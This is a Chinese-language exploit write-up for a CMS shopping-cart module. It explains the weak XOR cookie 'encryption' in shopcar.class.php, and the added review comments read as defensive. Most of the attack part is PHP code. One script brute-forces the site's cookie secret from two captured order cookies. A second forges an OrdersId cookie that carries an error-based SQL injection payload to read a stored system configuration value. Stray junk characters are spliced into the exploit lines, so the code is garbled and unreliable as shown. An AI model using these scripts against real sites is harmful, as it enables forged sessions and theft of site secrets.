www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个shopcar类是如何生成cookie的
/**
 * Persist one shop-cart value in a client-side cookie.
 *
 * Arrays go through enCode() first (neither enCode() nor the matching
 * decode path is shown here); strings are handed to enCrypt() as-is.
 * The cookie is set for 36000 seconds on path '/'.
 *
 * Review note: enCrypt() (below) is a repeating-key XOR transform with no
 * integrity check, so nothing here lets the server distinguish a cookie it
 * issued from one a client constructed. Mitigations: keep cart/order state
 * server-side keyed by a random session id, or attach an HMAC under a
 * server secret (hash_hmac) to the value and verify it with hash_equals()
 * before the value is used. The setcookie() call also passes no
 * secure/httponly flags.
 *
 * @param string $key   cookie name
 * @param mixed  $value array or string to store
 * @return void
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        // flatten the array before the XOR pass
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s lifetime, whole-site path; no secure/httponly flags
    setcookie($key,$value,time()+36000,'/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
/**
 * Obfuscate $txt for storage in a cookie.
 *
 * A per-call key is derived as md5(rand(0, 32000)) after seeding with
 * microtime(); each output position holds one key character in the clear
 * followed by the plaintext character XORed with that same key character
 * (the left operand of `.` is evaluated first, so both reads see $ctr
 * before the `$ctr++`). The result is XORed again by setKey() with the
 * site-wide secret and then base64-encoded.
 *
 * Review note: this is not encryption and must not be relied on for
 * confidentiality or integrity. srand()/rand() are not cryptographic, the
 * per-call key has only 32001 possible values (rand() bounds are
 * inclusive), and each key character is emitted next to the byte it masks,
 * so the input handed to setKey() is determined by $txt plus that small
 * choice. Mitigation: authenticate the cookie with an HMAC under a server
 * secret (hash_hmac + hash_equals) or use authenticated encryption
 * (sodium_crypto_secretbox), and keep the authoritative cart/order state
 * server-side.
 *
 * @param string $txt plaintext (already enCode()'d when it was an array)
 * @return string base64 of the doubly-XORed bytes
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000); // non-cryptographic seed
    $encrypt_key = md5(rand(0, 32000));   // 32 hex chars, 32001 possibilities
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index once it reaches the 32-char key length
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key char in the clear, then data char XOR that same key char
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XOR $txt with the md5 digest of the site-wide cookie secret.
 *
 * The key stream is md5(strtolower($cfg_cookie_encode)) — a fixed 32-char
 * lowercase hex string — applied as a repeating key; strtolower() means the
 * letter case of the configured secret contributes nothing. XOR is its own
 * inverse, so the same routine presumably serves as the decode step (the
 * decode path is not shown here).
 *
 * Review note: because XOR is self-inverse, any known (input, output) pair
 * for this function exposes the entire key stream, and with it the only
 * server-held secret in the scheme. The routine provides no integrity
 * either. Rotating $cfg_cookie_encode after an incident is necessary but
 * not sufficient; replace the scheme with an HMAC or authenticated
 * encryption rather than relying on this as encryption.
 *
 * @param string $txt bytes to mask (the output of enCrypt()'s first pass)
 * @return string $txt XORed with the repeating 32-char key
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    // 32 lowercase hex characters; the secret's case is discarded
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // restart the key once its 32 characters are used up
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
<?php' o7 V7 ?0 V+ W. N+ |- f, d5 y0 n/ i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
t- W4 l, ?1 {: P% [$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here- F8 W9 {' o6 m" p7 r' @2 a3 z* k
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( G& | i" m; r$ R$ c1 t
function reStrCode($code,$string)
. A4 {+ p; `5 Y0 E3 W{& p: L; Z) a0 h0 D6 B0 `
$code = base64_decode($code);" ^2 A$ K8 k7 v& z% ?: \
$key = “”;
. F( N/ Y6 S Ifor($i=0 ; $i<32 ; $i++)$ S& N* O2 {4 r; k3 S2 ^% M
{: ~, C3 L" g$ L! Q5 P$ k
$key .= $string[$i] ^ $code[$i];, u5 ^/ X2 j2 \) ] P3 |6 e3 H
}
0 W9 {2 l" w. b/ W* lreturn $key;8 ?# T! f5 M* W( J; N& S/ ^
}" ~4 S/ }* A5 C& b9 f9 j! r. a/ m
function getKeys($cookie,$plantxt)
5 v( D( P4 ~! H{ f5 W3 F3 d+ ]
$tmp = $cookie;# T# \& a1 {& ^$ I& Q" @1 o' r+ S
$results = array();, h& U9 m" ~7 V: K$ \6 v
for($j=0 ; $j < 32000; $j++)$ m7 }( X o, l2 @ i7 f. c
{
& |6 H: q$ @" M; ~9 T1 G% T6 g. U; ]$ L( Z8 r
$txt = $plantxt;
7 n5 l- R. ?. p! e$ctr = 0;
- ]: d* c3 f, k' s! {) j' g$tmp = ”;& v' ^" E) @- I, q1 o6 W
$encrypt_key = md5($j);/ j, x8 ~& A0 e5 \- c! [2 l2 L% n- ~
for($i =0; $i < strlen($txt); $i ++)
& R2 p6 i. v, L f ]4 q{
, l; d. k" t8 w8 e& m, t, n n* ~$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 |& \) V& m' v9 }
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);, |! q. f4 M- g0 h+ h% A% {6 E
}: N7 x' a; v% C; m V1 c
$string = $tmp;+ W! N1 c" c! C! @( h1 n0 L# c R
$code = $cookie;
: P8 U, k4 n O6 L$ q m$result = reStrCode($code,$string);' ?0 z: c K, b2 e
if(eregi(‘^[a-z0-9]+$’,$result))
& i% c9 a. h1 F! R# s{
2 K2 P* X6 r9 pecho $result.”\n”;
3 Z! t7 c7 R" g' }' C5 q$results[] = $result;
1 {5 G% N: [) M+ z5 r}5 ?6 k: J* ~5 ~# J) T! a
}( e" R0 h* c0 p1 N& K
return $results;4 A1 d% X# e8 h* L9 p& o/ s! z
}, t4 I( g7 _# K. U- p
$results1 = getKeys($cookie1,$plantxt);. h1 M0 T3 f8 M, h
$results2 = getKeys($cookie2,$plantxt);' _9 o. z# t- \% X+ [! o6 k
print “\n——————–real key————————–\n”;
# T. X1 I& e5 ~* E' D/ v2 ?# Iforeach($results1 as $test1)
, C# @9 h0 D- ?+ U4 M3 W8 }{
& T% e0 j4 Q8 T0 @$ f7 y+ _# k2 k4 Rforeach($results2 as $test2)6 ^9 Y& S; [4 }' ?8 ^# ]$ G
{' V3 N2 C3 ?! j( j, S
if($test1 == $test2)6 X C3 {$ O1 M# T( S
{
0 }) ^, j. A5 Q) Recho $test1.”\n”;
; K2 o& g& b" B+ E" ^8 |}5 @. V2 w* E$ K k% U
}6 ^6 ` a) m: s Z8 `; e
}
, z" @) i) t4 @5 V s?>7 }' u4 h$ |- n" ]7 R, L
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops
+ E }- A! o5 n6 D: V2 B21 {, S$ L* ~) K) j0 Q) ?
22 var $OrdersId;, E: E; P- `3 I% h2 }& K8 }
23 var $productsId;
$ J# }; a% g9 p24, g! m- }7 S9 e& g5 H" O, n
/**
 * Initialise the order id from the client's "OrdersId" cookie, creating a
 * new order only when the cookie is empty.
 *
 * Review note: the cookie value is accepted verbatim — the only check is
 * empty(), so any non-empty string the client sends becomes
 * $this->OrdersId (empty() also treats the string "0" as empty). Later on
 * this page (plus/carbuyaction.php) that value is interpolated into an SQL
 * string. Mitigation: validate the cookie against the expected id format
 * (fixed length / ctype_alnum) and fall back to MakeOrders() when it does
 * not match, and bind it as a query parameter wherever it reaches the
 * database. getCookie() and MakeOrders() are not shown here.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId"); // client-controlled value
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的
然后
/plus/carbuyaction.php中的
// plus/carbuyaction.php: the order id comes from MemberShops, i.e. from the
// client's "OrdersId" cookie (see MemberShops::__construct above); nothing
// here validates it before it is used further down.
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request (from cookie)
……
// $OrdersId is client-controlled (OrdersId cookie) and is interpolated
// straight into the SQL string. Mitigation: validate it against the
// expected id format before use and pass it as a bound parameter instead of
// building the query by interpolation. "#@__" is presumably the CMS
// table-prefix placeholder; GetOne()'s escaping behaviour is not shown here.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
7 C1 P+ n! Z( s; k) C4 t接着我们就可以注入了
: d' P$ n! y( ~5 n通过利用下面代码生成cookie:! ?* A! v5 @: M
<?php! N' D0 |" u" B
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;, A; r2 R8 t4 }1 J; h
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here+ ^9 y" v8 L2 J i7 J( G
function setKey($txt); F, h$ L* ?9 f: i& j% u
{
2 n4 j& n8 k9 n& o* F7 zglobal $encrypt_key;8 J1 U% c3 X( |+ Q) y
$ctr = 0;
9 m5 z, ] U) @8 ^ H$tmp = ”;
, {# @+ d+ Y g- z# @4 ^( mfor($i = 0; $i < strlen($txt); $i++)
. \0 H; [; N6 c( F% u" [{
4 V6 {( h6 ]6 c' U$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( y! o1 Q p, w
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];9 Z1 F+ h$ M$ I8 o8 [3 D7 ?
}1 B7 F9 d7 Q) B6 w* P, o' x' \
return $tmp;4 F/ q6 w' y& X2 f# D5 S! g+ f. K
}
) I4 F( C( W% V- s# `function enCrypt($txt)7 t/ l6 M# Y' }) b ^. A
{
4 @- T/ E% N# }2 dsrand((double)microtime() * 1000000);3 a' g& n. Q8 K% W; j
$encrypt_key = md5(rand(0, 32000));4 O% M x& a6 N) ~
$ctr = 0;3 j2 V5 I V( o$ R
$tmp = ”;) U. o& J- F0 @4 v
for($i = 0; $i < strlen($txt); $i++)
% a I+ a6 ?9 u{( N$ }. s' e# O2 Y8 n+ e/ B! Y' u
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;! `) p: s% [" } z! Y# @$ N$ J7 Y
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
' U' S0 b# f! o}
) u* s3 j. V0 p/ R" ^return base64_encode(setKey($tmp));
2 _5 P# \ F6 e$ k3 t& A( B4 S* E. K}! _5 { h4 M2 G& _; I
for($dest =0;$dest = enCrypt($txt);)5 @0 U' ^0 b$ \: U" z
{
* f. ^5 W t$ L1 g- r, }, r# ]if(!strpos($dest,’+'))
?0 c8 o/ [- _! G) t! g{
; L: q7 S; r2 u/ w" _: rbreak;1 X9 O, J5 B3 ~7 W
}
/ S, b0 M, j0 k: Y! o& l7 R0 X7 o}
% e0 ^. [7 h2 \echo $dest.”\n”;
, [0 v7 {: q# h?>